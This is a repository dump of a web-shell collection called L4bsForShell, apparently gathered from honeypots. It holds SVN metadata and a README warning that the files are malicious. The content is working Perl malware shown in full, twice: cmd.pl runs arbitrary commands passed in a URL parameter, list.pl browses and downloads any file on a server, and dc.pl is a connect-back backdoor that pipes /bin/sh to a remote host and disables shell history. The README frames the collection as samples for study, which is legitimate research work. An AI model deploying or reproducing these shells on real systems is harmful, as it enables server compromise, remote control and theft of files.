    6 | 9 | -------------------------------------------------------------------------------- /PL/.svn/all-wcprops: -------------------------------------------------------------------------------- 1 | K 25 2 | svn:wc:ra_dav:version-url 3 | V 35 4 | /svn/!svn/ver/16/trunk/Backdoors/PL 5 | END 6 | cgitelnet.txt 7 | K 25 8 | svn:wc:ra_dav:version-url 9 | V 49 10 | /svn/!svn/ver/16/trunk/Backdoors/PL/cgitelnet.txt 11 | END 12 | cmd.pl 13 | K 25 14 | svn:wc:ra_dav:version-url 15 | V 41 16 | /svn/!svn/ver/3/trunk/Backdoors/PL/cmd.pl 17 | END 18 | up.pl 19 | K 25 20 | svn:wc:ra_dav:version-url 21 | V 40 22 | /svn/!svn/ver/3/trunk/Backdoors/PL/up.pl 23 | END 24 | dc.pl 25 | K 25 26 | svn:wc:ra_dav:version-url 27 | V 41 28 | /svn/!svn/ver/16/trunk/Backdoors/PL/dc.pl 29 | END 30 | Perl Web Shell by RST-GHC.pl 31 | K 25 32 | svn:wc:ra_dav:version-url 33 | V 71 34 | /svn/!svn/ver/6/trunk/Backdoors/PL/Perl%20Web%20Shell%20by%20RST-GHC.pl 35 | END 36 | list.pl 37 | K 25 38 | svn:wc:ra_dav:version-url 39 | V 42 40 | /svn/!svn/ver/3/trunk/Backdoors/PL/list.pl 41 | END 42 | -------------------------------------------------------------------------------- /PL/.svn/entries: -------------------------------------------------------------------------------- 1 | 10 2 | 3 | dir 4 | 19 5 | https://web-malware-collection.googlecode.com/svn/trunk/Backdoors/PL 6 | https://web-malware-collection.googlecode.com/svn 7 | 8 | 9 | 10 | 2012-02-21T15:40:40.393223Z 11 | 16 12 | the.infodox@gmail.com 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 0305ef65-cdf5-4f86-fc4c-e3b0785f7043 28 | 29 | dc.pl 30 | file 31 | 32 | 33 | 34 | 35 | 2012-06-13T20:36:45.021987Z 36 | 4bd1d725927f99f38c17dc82a5f56e55 37 | 2012-02-21T15:40:40.393223Z 38 | 16 39 | the.infodox@gmail.com 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 1993 62 | 63 | Perl Web Shell by RST-GHC.pl 64 | file 65 | 66 | 67 | 68 | 69 | 2012-06-13T20:36:45.021987Z 70 | 72066ebafdf76d14fcb0c198bbda021c 71 | 2012-02-08T09:23:47.111275Z 72 | 6 73 | the.infodox@gmail.com 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 19631 96 | 97 | list.pl 98 | file 99 | 100 | 101 | 102 | 103 | 2012-06-13T20:36:45.021987Z 104 | 9f564131fe0b3b4f4bbd5a8b61297034 105 | 2012-02-01T17:03:16.160727Z 106 | 3 107 | the.infodox@gmail.com 108 | has-props 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 1978 130 | 131 | cgitelnet.txt 132 | file 133 | 134 | 135 | 136 | 137 | 2012-06-13T20:36:45.025987Z 138 | 916a34c220df028445a9a47aba357a72 139 | 2012-02-21T15:40:40.393223Z 140 | 16 141 | the.infodox@gmail.com 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 23851 164 | 165 | cmd.pl 166 | file 167 | 168 | 169 | 170 | 171 | 2012-06-13T20:36:45.025987Z 172 | b2b4e5f7554c9876df20af0fb7444d08 173 | 2012-02-01T17:03:16.160727Z 174 | 3 175 | the.infodox@gmail.com 176 | has-props 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 1032 198 | 199 | up.pl 200 | file 201 | 202 | 203 | 204 | 205 | 2012-06-13T20:36:45.029987Z 206 | f03e1f5a20b05500e74a68f6e5062e91 207 | 2012-02-01T17:03:16.160727Z 208 | 3 209 | the.infodox@gmail.com 210 | has-props 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 12836 232 | 233 | -------------------------------------------------------------------------------- /PL/.svn/prop-base/cmd.pl.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /PL/.svn/prop-base/list.pl.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /PL/.svn/prop-base/up.pl.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /PL/.svn/text-base/cgitelnet.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PL/.svn/text-base/cgitelnet.txt.svn-base -------------------------------------------------------------------------------- /PL/.svn/text-base/cmd.pl.svn-base: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # PerlKit-0.1 - http://www.t0s.org 4 | # 5 | # cmd.pl: Run commands on a webserver 6 | 7 | use strict; 8 | 9 | my ($cmd, %FORM); 10 | 11 | $|=1; 12 | 13 | print "Content-Type: text/html\r\n"; 14 | print "\r\n"; 15 | 16 | # Get parameters 17 | 18 | %FORM = parse_parameters($ENV{'QUERY_STRING'}); 19 | 20 | if(defined $FORM{'cmd'}) { 21 | $cmd = $FORM{'cmd'}; 22 | } 23 | 24 | print ' 25 | 26 |
    27 | 28 | 29 |
    30 |
    ';
    31 | 
    32 | if(defined $FORM{'cmd'}) {
    33 |   print "Results of '$cmd' execution:\n\n";
    34 |   print "-"x80;
    35 |   print "\n";
    36 | 
    37 |   open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
    38 | 
    39 |   while() {
    40 |     print;
    41 |   }
    42 | 
    43 |   close(CMD);
    44 |   print "-"x80;
    45 |   print "\n";
    46 | }
    47 | 
    48 | print "
    "; 49 | 50 | sub parse_parameters ($) { 51 | my %ret; 52 | 53 | my $input = shift; 54 | 55 | foreach my $pair (split('&', $input)) { 56 | my ($var, $value) = split('=', $pair, 2); 57 | 58 | if($var) { 59 | $value =~ s/\+/ /g ; 60 | $value =~ s/%(..)/pack('c',hex($1))/eg; 61 | 62 | $ret{$var} = $value; 63 | } 64 | } 65 | 66 | return %ret; 67 | } 68 | -------------------------------------------------------------------------------- /PL/.svn/text-base/dc.pl.svn-base: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | use IO::Socket; 3 | #cONNECT BACKDOOR EDITED BY XORON 4 | #lord@SlackwareLinux:/home/programing$ perl dc.pl 5 | #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 6 | # 7 | #Usage: dc.pl [Host] [Port] 8 | # 9 | #Ex: dc.pl 127.0.0.1 2121 10 | #lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 11 | #--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- 12 | # 13 | #[*] Resolving HostName 14 | #[*] Connecting... 127.0.0.1 15 | #[*] Spawning Shell 16 | #[*] Connected to remote host 17 | 18 | #bash-2.05b# nc -vv -l -p 2121 19 | #listening on [any] 2121 ... 20 | #connect to [127.0.0.1] from localhost [127.0.0.1] 32769 21 | #--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- 22 | # 23 | #--==Systeminfo==-- 24 | #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux 25 | # 26 | #--==Userinfo==-- 27 | #uid=1001(xoron) gid=100(users) groups=100(users) 28 | # 29 | #--==Directory==-- 30 | #/root 31 | # 32 | #--==Shell==-- 33 | # 34 | $system = '/bin/sh'; 35 | $ARGC=@ARGV; 36 | print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n"; 37 | if ($ARGC!=2) { 38 | print "Usage: $0 [Host] [Port] \n\n"; 39 | die "Ex: $0 127.0.0.1 2121 \n"; 40 | } 41 | use Socket; 42 | use FileHandle; 43 | socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 44 | connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 45 | print "[*] Resolving HostName\n"; 46 | print "[*] Connecting... $ARGV[0] \n"; 47 | print "[*] Spawning Shell \n"; 48 | print "[*] Connected to remote host \n"; 49 | SOCKET->autoflush(); 50 | open(STDIN, ">&SOCKET"); 51 | open(STDOUT,">&SOCKET"); 52 | open(STDERR,">&SOCKET"); 53 | print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n"; 54 | system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo; 55 | echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "); 56 | system($system); 57 | #EOF -------------------------------------------------------------------------------- /PL/.svn/text-base/list.pl.svn-base: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # PerlKit-0.1 - http://www.t0s.org 4 | # 5 | # browse.pl: Browse and download files from a webserver 6 | 7 | use strict; 8 | 9 | my ($path, %FORM); 10 | 11 | $|=1; 12 | 13 | 14 | # Get parameters 15 | 16 | %FORM = parse_parameters($ENV{'QUERY_STRING'}); 17 | 18 | if(defined $FORM{'path'}) { 19 | $path = $FORM{'path'}; 20 | 21 | 22 | } else { 23 | $path = "/"; 24 | } 25 | 26 | if(-f $path) { # Download selected file 27 | print "Content-Type: application/octet-stream\r\n"; 28 | print "\r\n"; 29 | open(FILE, "< $path") || print "Could not open file\n"; 30 | 31 | while() { 32 | print; 33 | } 34 | 35 | close(FILE); 36 | exit; 37 | } 38 | 39 | print "Content-Type: text/html\r\n"; 40 | print "\r\n"; 41 | 42 | print ' 43 | 44 |
    45 | 46 | 47 |
    48 | Directory ' . $path . ' contents: 49 |

    50 | 51 | '; 52 | 53 | if(defined $FORM{'path'}) { 54 | 55 | opendir(DIR, $path) || print "Could not open directory"; 56 | 57 | foreach (sort(readdir(DIR))) { 58 | print get_fileinfo($path, $_). "\n"; 59 | } 60 | 61 | closedir(DIR); 62 | 63 | } 64 | 65 | print "
    "; 66 | 67 | sub parse_parameters ($) { 68 | my %ret; 69 | 70 | my $input = shift; 71 | 72 | foreach my $pair (split('&', $input)) { 73 | my ($var, $value) = split('=', $pair, 2); 74 | 75 | if($var) { 76 | $value =~ s/\+/ /g ; 77 | $value =~ s/%(..)/pack('c',hex($1))/eg; 78 | 79 | $ret{$var} = $value; 80 | } 81 | } 82 | 83 | return %ret; 84 | } 85 | 86 | sub get_fileinfo ($$) { 87 | my $ret; 88 | 89 | my ($dir,$filename) = @_; 90 | my $file = $dir . "/" . $filename; 91 | 92 | $file=~s/\/+/\//g; 93 | 94 | $ret = ""; 95 | 96 | $ret .= ""; 97 | 98 | if(-d $file) { 99 | $file=~s/\/[^\/]+\/\.\./\//g; 100 | $ret .= "$filename"; 101 | } else { 102 | $ret .= "$filename [D]" ; 103 | } 104 | $ret .= ""; 105 | 106 | my ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size, $atime,$mtime,$ctime,$blksize,$blocks) = stat($file); 107 | 108 | $ret .= " "; 109 | $ret .= "$size"; 110 | $ret .= "". getpwuid($uid) .""; 111 | $ret .= "". getgrgid($gid) .""; 112 | 113 | $ret .= ""; 114 | 115 | return $ret; 116 | } 117 | -------------------------------------------------------------------------------- /PL/cgitelnet.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PL/cgitelnet.txt -------------------------------------------------------------------------------- /PL/cmd.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # PerlKit-0.1 - http://www.t0s.org 4 | # 5 | # cmd.pl: Run commands on a webserver 6 | 7 | use strict; 8 | 9 | my ($cmd, %FORM); 10 | 11 | $|=1; 12 | 13 | print "Content-Type: text/html\r\n"; 14 | print "\r\n"; 15 | 16 | # Get parameters 17 | 18 | %FORM = parse_parameters($ENV{'QUERY_STRING'}); 19 | 20 | if(defined $FORM{'cmd'}) { 21 | $cmd = $FORM{'cmd'}; 22 | } 23 | 24 | print ' 25 | 26 |

    27 | 28 | 29 |
    30 |
    ';
    31 | 
    32 | if(defined $FORM{'cmd'}) {
    33 |   print "Results of '$cmd' execution:\n\n";
    34 |   print "-"x80;
    35 |   print "\n";
    36 | 
    37 |   open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
    38 | 
    39 |   while() {
    40 |     print;
    41 |   }
    42 | 
    43 |   close(CMD);
    44 |   print "-"x80;
    45 |   print "\n";
    46 | }
    47 | 
    48 | print "
    "; 49 | 50 | sub parse_parameters ($) { 51 | my %ret; 52 | 53 | my $input = shift; 54 | 55 | foreach my $pair (split('&', $input)) { 56 | my ($var, $value) = split('=', $pair, 2); 57 | 58 | if($var) { 59 | $value =~ s/\+/ /g ; 60 | $value =~ s/%(..)/pack('c',hex($1))/eg; 61 | 62 | $ret{$var} = $value; 63 | } 64 | } 65 | 66 | return %ret; 67 | } 68 | -------------------------------------------------------------------------------- /PL/dc.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | use IO::Socket; 3 | #cONNECT BACKDOOR EDITED BY XORON 4 | #lord@SlackwareLinux:/home/programing$ perl dc.pl 5 | #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 6 | # 7 | #Usage: dc.pl [Host] [Port] 8 | # 9 | #Ex: dc.pl 127.0.0.1 2121 10 | #lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 11 | #--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- 12 | # 13 | #[*] Resolving HostName 14 | #[*] Connecting... 127.0.0.1 15 | #[*] Spawning Shell 16 | #[*] Connected to remote host 17 | 18 | #bash-2.05b# nc -vv -l -p 2121 19 | #listening on [any] 2121 ... 20 | #connect to [127.0.0.1] from localhost [127.0.0.1] 32769 21 | #--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- 22 | # 23 | #--==Systeminfo==-- 24 | #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux 25 | # 26 | #--==Userinfo==-- 27 | #uid=1001(xoron) gid=100(users) groups=100(users) 28 | # 29 | #--==Directory==-- 30 | #/root 31 | # 32 | #--==Shell==-- 33 | # 34 | $system = '/bin/sh'; 35 | $ARGC=@ARGV; 36 | print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n"; 37 | if ($ARGC!=2) { 38 | print "Usage: $0 [Host] [Port] \n\n"; 39 | die "Ex: $0 127.0.0.1 2121 \n"; 40 | } 41 | use Socket; 42 | use FileHandle; 43 | socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 44 | connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 45 | print "[*] Resolving HostName\n"; 46 | print "[*] Connecting... $ARGV[0] \n"; 47 | print "[*] Spawning Shell \n"; 48 | print "[*] Connected to remote host \n"; 49 | SOCKET->autoflush(); 50 | open(STDIN, ">&SOCKET"); 51 | open(STDOUT,">&SOCKET"); 52 | open(STDERR,">&SOCKET"); 53 | print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n"; 54 | system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo; 55 | echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "); 56 | system($system); 57 | #EOF -------------------------------------------------------------------------------- /PL/list.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # PerlKit-0.1 - http://www.t0s.org 4 | # 5 | # browse.pl: Browse and download files from a webserver 6 | 7 | use strict; 8 | 9 | my ($path, %FORM); 10 | 11 | $|=1; 12 | 13 | 14 | # Get parameters 15 | 16 | %FORM = parse_parameters($ENV{'QUERY_STRING'}); 17 | 18 | if(defined $FORM{'path'}) { 19 | $path = $FORM{'path'}; 20 | 21 | 22 | } else { 23 | $path = "/"; 24 | } 25 | 26 | if(-f $path) { # Download selected file 27 | print "Content-Type: application/octet-stream\r\n"; 28 | print "\r\n"; 29 | open(FILE, "< $path") || print "Could not open file\n"; 30 | 31 | while() { 32 | print; 33 | } 34 | 35 | close(FILE); 36 | exit; 37 | } 38 | 39 | print "Content-Type: text/html\r\n"; 40 | print "\r\n"; 41 | 42 | print ' 43 | 44 |
    45 | 46 | 47 |
    48 | Directory ' . $path . ' contents: 49 |

    50 | 51 | '; 52 | 53 | if(defined $FORM{'path'}) { 54 | 55 | opendir(DIR, $path) || print "Could not open directory"; 56 | 57 | foreach (sort(readdir(DIR))) { 58 | print get_fileinfo($path, $_). "\n"; 59 | } 60 | 61 | closedir(DIR); 62 | 63 | } 64 | 65 | print "
    "; 66 | 67 | sub parse_parameters ($) { 68 | my %ret; 69 | 70 | my $input = shift; 71 | 72 | foreach my $pair (split('&', $input)) { 73 | my ($var, $value) = split('=', $pair, 2); 74 | 75 | if($var) { 76 | $value =~ s/\+/ /g ; 77 | $value =~ s/%(..)/pack('c',hex($1))/eg; 78 | 79 | $ret{$var} = $value; 80 | } 81 | } 82 | 83 | return %ret; 84 | } 85 | 86 | sub get_fileinfo ($$) { 87 | my $ret; 88 | 89 | my ($dir,$filename) = @_; 90 | my $file = $dir . "/" . $filename; 91 | 92 | $file=~s/\/+/\//g; 93 | 94 | $ret = ""; 95 | 96 | $ret .= ""; 97 | 98 | if(-d $file) { 99 | $file=~s/\/[^\/]+\/\.\./\//g; 100 | $ret .= "$filename"; 101 | } else { 102 | $ret .= "$filename [D]" ; 103 | } 104 | $ret .= ""; 105 | 106 | my ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size, $atime,$mtime,$ctime,$blksize,$blocks) = stat($file); 107 | 108 | $ret .= " "; 109 | $ret .= "$size"; 110 | $ret .= "". getpwuid($uid) .""; 111 | $ret .= "". getgrgid($gid) .""; 112 | 113 | $ret .= ""; 114 | 115 | return $ret; 116 | } 117 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | L4bsForShell 2 | ============ 3 | 4 | Labs For Shell es un repositorio que contiene web shells, el cual estara siendo actualizada regularmente 5 | 6 | 7 | ========== 8 | 9 | Shells recolectadas originalmente por @the_infodox a continuacion se deja el comentario respectivo del autor original. 10 | 11 | WARNING: These files are malicious. They are recovered from honeypots, deposited by "donors" and found by endless googling. 12 | 13 | The structure is broken down to Backdoors, Bots, Honey, and Malicious Scripts. 14 | 15 | Backdoors be backdoors. They are likely backdoored by their authors. 16 | Bots are bots. Obviously. 17 | "Honey" means random unsorted crap from honeypots. 18 | Malicious Scripts are everything from iFramers, to DoS scripts, to scanners. 19 | 20 | blog.infodox.co.cc 21 | @the_infodox 22 | 23 | ***Contribuciones *** 24 | 25 | CCCPShell: https://github.com/xchwarze/CCCPShell 26 | 27 | @Snifer 28 | 29 | @the_infodox 30 | 31 | Site: 32 | * http://sniferl4bs.com/ 33 | 34 | 35 | Twitter: 36 | *@sniferl4bs 37 | 38 | Correo: 39 | *snifer_jmc@hotmail.com 40 | --------------------------------------------------------------------------------